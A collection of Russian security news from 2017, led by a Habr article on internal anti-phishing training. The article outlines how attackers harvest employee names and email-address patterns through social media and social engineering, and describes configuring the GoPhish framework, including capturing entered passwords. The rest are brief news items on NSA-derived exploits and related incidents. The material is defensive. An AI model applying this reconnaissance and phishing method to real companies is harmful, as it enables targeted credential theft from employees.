Я параноик и никогда не указываю название компании, где я работаю, скажете вы? А в друзья вы коллег из компании не добавляете в соцсетях? А все ли они не указывают название компании? Не думаю. Проведя пару часов в сети, исследуя любую интересующую нас компанию, можно достаточно легко и быстро получить список имен и фамилий сотрудников компании. Попадание будет достаточно большим, причем в дополнение к фамилиям можно достаточно легко узнать список увлечений и занятий сотрудников, что может быть использовано против них… например, для создания персонализированных фишинговых писем. Но корпоративные адреса почты найти не так просто, скажете вы? Опять разочарую. Зная название компании, легко найти ее корпоративный сайт. Соответственно, домен уже есть. Зачастую на корпоративных сайтах есть и общие почтовые контакты, они нам тоже пригодятся. Теперь самое сложное: нам нужно получить пару действительных адресов почт сотрудников компании. Для этого можно, например, написать на один из публичных адресов компании. Обратиться в техподдержку, например. Попробовать что-то купить в sales. Если публичного адреса на сайте нет, то всегда можно просто позвонить по телефону и поговорить с секретарем. Социальная инженерия творит чудеса.

Мне посчастливилось побывать на выступлении Chris "loganWHD" Hadnagy. Организация ежегодно проводит соревнования по добровольному взлому (пентесту) других компаний. Вывод из лекции был простой: социальной инженерией можно получить любую информацию. Неподготовленный человек от этого не защищён. К тому же ничто не помешает перед звонком получить данные о секретаре компании из социальных сетей. Это поможет упростить разговор. Итак, будем считать, что мы выяснили пару адресов сотрудников. Смотрим на паттерн в адресах. Он есть! Админы ведь почту не из головы каждый раз придумывают. Паттернов не много: фамилия, ФИО, имя_фамилия и т.п. Накладываем паттерн на базу фамилий и имен, и вот у нас база почтовых адресов компании. Зачем нам все это? Есть такое понятие как Kill chain.



Нас интересует верхняя часть картинки. Итак, мы с вами поняли, что разведку о нас злоумышленники легко проведут в социальных сетях. Соответственно, будет составлен список адресов и осуществлена отправка. Если мы говорим о целевой атаке на компанию, а с учетом разведки предположим, что идет именно она, специально, чтобы обойти стандартные спам-защиты злоумышленники приобрели несколько временных доменов и, соответственно, все наши спам-фильтры будут пройдены, и письмо окажется в почтовом ящике сотрудника. Что дальше? Запуск вложенного файла/переход по ссылке. Неподготовленный пользователь (уж точно несколько среди сотрудников компании) перейдет по ссылке, откроет вложении. По данным Positive Technologies, за 2015 год 24% пользователей, получив письмо, перешли по ссылке, а 15% ввели учетные данные или установили ПО. Процент таких пользователей год от года только растет.


Сработает ли эксплойт? Да (здесь можно вставить много о WannaCry). И вот почему. В отчете HP Enterprise есть вот такая интересная инфографика, это новые уязвимости ПО, появившиеся в 2015 году. Уязвимости есть, и регулярно находят новые. И о них даже знают исследователи:


Часто о них никто и не знает. И бывает вот так (а еще и NSA есть).


На этом «Kill chain» для нас закончен. Заражение произошло, злоумышленник завладел нашим компьютером. Что с ним он будет делать дальше конечно интересно? В любом случае оставим дальнейшее вне рамок данной статьи. Мы хотим понять, что мы можем этому противопоставить? А противопоставить мы можем немногое. Да, можно корпоративными политиками и правилами запретить людям пользоваться социальными сетями и публиковать в них информацию о работе, но с ростом количества сотрудников это становится малореальным. Да, можно тренировать спам-фильтры и использовать дорогостоящие системы обнаружения угроз, но даже самые продвинутые из них зачастую не на 100% гарантируют фильтрацию опасного письма.

Что остается? Остается обучать и еще раз обучать сотрудников на регулярной основе, обучать определять фишинг и просто удалять эти письма, предварительно оповещая ИТ-отдел/службу безопасности о получении подозрительного письма. Недавно в своей компании мы провели «антифишинговое» обучение.


Обучение

Как мы будем учить? А учить мы будем, устраивая социальный пентест своей компании. Можно пойти несколькими способами.


Пентест на заказ

Побродив по просторам интернета можно достаточно легко найти несколько компаний, которые с радостью выпустят вашими социальными пентестерами:

Например, www.infosec.ruphishman.ruattack.antph.ru

Можно пойти этим путем, но нужно понимать, что бюджет данного мероприятия будет зависеть от размеров организации и составлять несколько сотен тысяч рублей в минимальном варианте. По желанию заказчика, представители пентесторов даже могут провести полноценный социальный поиск и добыть адреса почты сами, а могут работать и уже с готовыми данными. Обучение по результатам пениста будет стоить отдельных денег. Из интересного в интернете мы нашли еще пару SaS сервисов:

phishme.com
• [infosecinstitute.com/phishsim](https://www.infosecinstitute.com/phishsim )

Стоить подобные сервисы будут около 20$ в год за почтовый адрес, но нужно учитывать, что готовые базы шаблонов, которые содержатся в них, будут англоязычными (хотя можно всегда загрузить свои шаблоны) + все международные сервисы (видимо для того, чтобы избежать юридических претензий) в обязательном порядке пишут маленькими буквами внизу письма, что это проверка на фишинг, что, по моему мнению, несколько снижает чистоту эксперимента.


Игровые варианты

Одной из лучших методик обучения является игровая. К примеру, недавно так поступил Сбербанк. Метод, без сомнения, эффективный, но содержит пару недостатков. К сожалению, данный метод действует по факту один раз, а учитывая развитие средств и возможностей, фишингу обучаться нужно на регулярной основе. Но что самое главное, игру нужно делать самому и под себя. В открытом доступе готовых решений найти не удалось.


GoPhish



Теперь давайте я расскажу о решении, которое в конечном счете выбрали для себя мы: GoPhish — OpenSource фреймворк для фишинга. GoPhish, пожалуй, незаслуженно обойден вниманием на Хабре. Поиском удалось найти всего одну статью по данному продукту, а продукт стоит того.


Возможности GoPhish

Gophish осуществляет рассылку писем по заранее заданным шаблонам и спискам email-адресов. Также данное ПО использует встроенный веб-сервер для отображения фишинговых страниц. Ссылки для перехода на данные страницы находятся в тексте писем. Для контроля за процессом фишинг-теста используется сущность «компания» — она объединяет шаблон письма, список адресов со списком «пользователей-целей» (Фамилия, Имя, email-адрес), фишинговую страницу и набор параметров SMTP. После того как «компания» запущена в интерфейсе ПО можно просмотреть, кто из пользователей перешел по ссылке на фишинговую страницу, а кто нет. ПО Gophish также предоставляет API, но нам хватило и базового функционала.


Установка GoPhish

Продукт написан на Go и в скомпилированном виде представляет собой один бинарник. Установка проста и не вызывает проблем, есть хороший и простой мануал. Вся процедура установки сводится к генерации ssl сертификат и созданию простого и понятно config.json файла.

"admin_server" : 
{ "listen_url" : "127.0.0.1:3333",
   "use_tls" : true,
    "cert_path" : "gophish.crt",
    "key_path" : "gophish.key" 
} 

Пояснять что-то здесь я считаю излишним. Все просто и понятно. Осталось запустить сервис, выполнив такую команду:
gophish@gophish.dev:~/src/github.com/gophish/gophish$ ./gophish
Все дальнейшие работы производятся с использованием веб-интерфейса фреймворка. Первое что, нужно сделать — это добавить сотрудников (вкладка «Users & Groups»). Можно импортировать список пользователей из csv файла (например, выгрузив csv с нужными нам полями из AD) или ввести данные пользователей вручную. Далее нужно создать шаблоны писем (вкладка «Email templates»). Текст письма можно вводить в виде текста (вкладка «Text») или с помощью HTML (вкладка «HTML»).


Если отметить флажок «Add tracking image», в письмо будет добавлена «следящая картинка» размером 1х1 пиксель. Картинка используется для отслеживания факта открытия письма пользователем. В тексте письма можно использовать следующие ссылочные значения:


Значение Описание
{{.FirstName}} Имя
{{.LastName}} Фамилия
{{.Position}} Должность
{{.From}} Отправитель
{{.TrackingURL}} url для отслеживания
{{.Tracker}} Картинка для отслеживания
{{.URL}} url страницы перехода

Далее создаем «фишинговые» страницы (вкладка «Landing Pages»), HTML -код страницы нужно ввести в соответствующее окно интерфейса. Поскольку мы не собираемся заниматься реальным фишингом среди своих сотрудников, а хотим их обучать, в качестве фишинговый страницы мы использовали страницу с обучающим материалом, рассказывающим сотрудникам, что такое фишинг и как не попасться на его удочку. (Шаблон страницы выложим во второй части статьи).



Можно также создавать страницы с полями ввода. Причем есть опции, которые сохраняют в том числи и пароли, введенные пользователями, но лучше пользоваться этим очень аккуратно. Теперь создаем профили отправки (вкладка «Sending Profiles»), т.е. по сути некие почтовые данные от имени кого, сотрудник получит письмо и какой почтовый сервер мы будем использовать для рассылки. На последнем шаге создаем кампанию (вкладка Campaigns). «Компания» объединяет все ранее описанное. После ввода всех параметров нужно нажать кнопку «Launch campaign», и компания запустится автоматически.

За результатами компании можно следить на вкладке «Dashboard».

<img
src="https://habrastorage.org/web/e4b/db6/8e9/e4bdb68e97f1496baf6b16637658d21d.png"/>

На данной вкладке показан общий процент, перешедших по ссылкам пользователей и результативность каждой компании в процентах. Всегда можно перейти и посмотреть подробности по компании и увидеть конкретных сотрудников, кликнувших по ссылке.


Продолжение следует

На этом мы завершаем первую часть нашей статьи. Скоро мы добавим вторую половину, в которой поделимся с вами шаблонами фишинговых писем и страницей обучения. Расскажем о реакции наших сотрудников (она порой была не предсказуема и прекрасна!) и поделимся результатами, которых нам удалось достичь. А еще упомянем о наших граблях, на которые посоветуем вам не наступать.

Дата: 2017-05-25 13:40:28

Источник: https://habrahabr.ru/post/329470/



Более 24 тыс. ПК на базе Windows уязвимы к атакам с использованием EsteemAudit

Microsoft не намерена выпускать патчи для уязвимостей, эксплуатируемых инструментами EnglishmanDentist, EsteemAudit и ExplodingCan.

12 мая мир захлестнула волна атак вымогательского ПО WannaCry, поразившего более 400 тыс. компьютеров в свыше 150 странах мира. Для распространения червя хакеры использовали модифицированный инструмент Агентства национальной безопасности США EternalBlue для уязвимости в SMB, содержащийся в числе эксплоитов для уязвимостей в различных версиях ОС Windows, опубликованных в минувшем апреле кибергруппировкой The Shadow Brokers.

Хотя в марте Microsoft выпустила патчи для поддерживаемых версий Windows, устраняющие уязвимости в SMB, и двумя месяцами позже представила экстренные обновления для неподдерживаемых платформ, компания так и не исправила проблемы, эксплуатируемые другими инструментами из арсенала АНБ, в частности, EnglishmanDentist, EsteemAudit и ExplodingCan.

Как заявили в Microsoft, указанные эксплоиты не работают на поддерживаемых версиях Windows, а значит, пользователи Windows 7 и выше не подвергаются риску атак.

Инструмент EsteemAudit эксплуатирует уязвимости в Remote Desktop Protocol (RDP) на компьютерах под управлением Windows Server 2003 / Windows XP. По данным исследователей из компании enSilo, в настоящее время более 24 тыс. ПК уязвимы к атакам с использованием данного эксплоита.


«На долю Windows XP приходится более 7% ОС, использующихся на сегодняшний день. По оценкам экспертов, более 600 тыс. хостов, на которых размещаются свыше 175 млн web-сайтов, все еще работают на Windows Server 2003», - отмечают исследователи.

Как отмечается, эксплоит EsteemAudit могут взять на вооружение хакерские группировки, такие как CrySiS, Dharma и SamSam, использующие RDP для инфицирования компьютеров жертв.

Тем временем, специалисты enSilo выпустили патч для Windows XP и Server 2003, предотвращающий атаки с применением EsteemAudit.

Дата: 2017-05-25 12:49:28

Источник: http://www.securitylab.ru/news/486268.php



Приморский хакер шантажировал оператора связи

Злоумышленник грозился заблокировать работу сотового оператора, если не получит выкуп.

Прокуратура Приморского края вынесла обвинительное заключение в отношении местного жителя, создавшего ПО для блокировки информации и шантажировавшего крупную телекоммуникационную компанию.

По данным следствия, летом прошлого года обвиняемый создал вредоносную программу, позволяющую парализовать работу компьютерных сетей и блокировать информацию пользователей. Злоумышленник отправил службе поддержки сотового оператора несколько электронных писем с сообщением об обнаруженной им уязвимости. Хакер заявил, что может проэксплуатировать данную уязвимость с помощью разработанного им ПО, однако не сделает этого, если компания заплатит ему выкуп.

Денег от сотового оператора горе-преступник так и не получил, однако воспользоваться своим эксплоитом не успел, поскольку был задержан сотрудниками регионального управления ФСБ. Открытое в отношении приморца уголовное дело направлено в Лесозаводский районный суд Приморского края для рассмотрения по существу.

Дата: 2017-05-25 11:14:47

Источник: http://www.securitylab.ru/news/486266.php



ФСБ обнаружила закрытые чаты террористов в Telegram

Закрытые чаты использовались для связи между участниками международных террористических группировок.

Глава Федеральной службы безопасности РФ Александр Бортников сообщил о выявлении сотрудниками ведомства закрытых чатов террористов в Telegram, используемых для взаимодействия между членами международных террористических группировок.

«В результате получена информация о конкретных террористах, преступных связях внутри России и стран центральноазиатского региона, используемых средствах связи, а также выявлены планы, намерения и места вероятного их нахождения», - приводит «РИА Новости» выдержку из выступления Бортникова на заседании совета руководителей органов безопасности и спецслужб СНГ.

Напомним, 24 мая в Госдуму был внесен законопроект регулирующий деятельность мессенджеров и предусматривающий обязательную идентификацию пользователей. Документ прописывает обязанности мессенджеров, в числе которых обязанность обеспечить идентификацию пользователей в соответствии с российским законодательством, а также ограничивать рассылку и передачу сообщений, содержащих противоправную информацию. В случае невыполнения требований доступ к сервису может быть заблокирован.

Telegram - защищенный от прослушивания бесплатный кроссплатформенный мессенджер для смартфонов и других устройств, позволяющий обмениваться текстовыми сообщениями и медиафайлами различных форматов.

Дата: 2017-05-25 11:04:00

Источник: http://www.securitylab.ru/news/486267.php



РТ-ИНФОРМ и Банк России будут сотрудничать в сфере кибербезопасности

Компания «РТ-ИНФОРМ» (Центр компетенции по информационным технологиям Госкорпорации Ростех) и Центральный банк Российской Федерации в ходе конференции «Цифровая индустрия промышленной России» (ЦИПР-2017), которая проходит в Иннополисе с 24 по 26 мая, подписали соглашение о сотрудничестве в вопросах обеспечения информационной безопасности.

Целью подписанного соглашения является организация взаимодействия сторон, направленного на предупреждение, выявление и создание условий для пресечения правонарушений на финансовом рынке России, в национальной платежной системе, в информационной инфраструктуре организаций Ростеха и повышение уровня информационной безопасности. Свои подписи под документом поставили генеральный директор «РТ-ИНФОРМ» Камиль Газизов и начальник Главного управления безопасности и защиты информации Банка России Сергей Петрищев.

 «Мы высоко оцениваем работу Банка России, в частности Центра мониторинга и реагирования на компьютерные атаки в кредитно-финансовой сфере (ФинЦЕРТ) по своевременному информированию профессионального сообщества о киберугрозах и те рекомендации, которые он вырабатывает,  - отмечает генеральный директор «РТ-ИНФОРМ» Камиль Газизов. Объединение усилий позволит эффективнее противостоять киберататкам путем взаимного информирования об основных типах и механизмах их реализации, успешных методах противодействия подобного рода атакам».

Дата: 2017-05-25 10:40:28

Источник: https://www.anti-malware.ru/news/2017-05-25/23037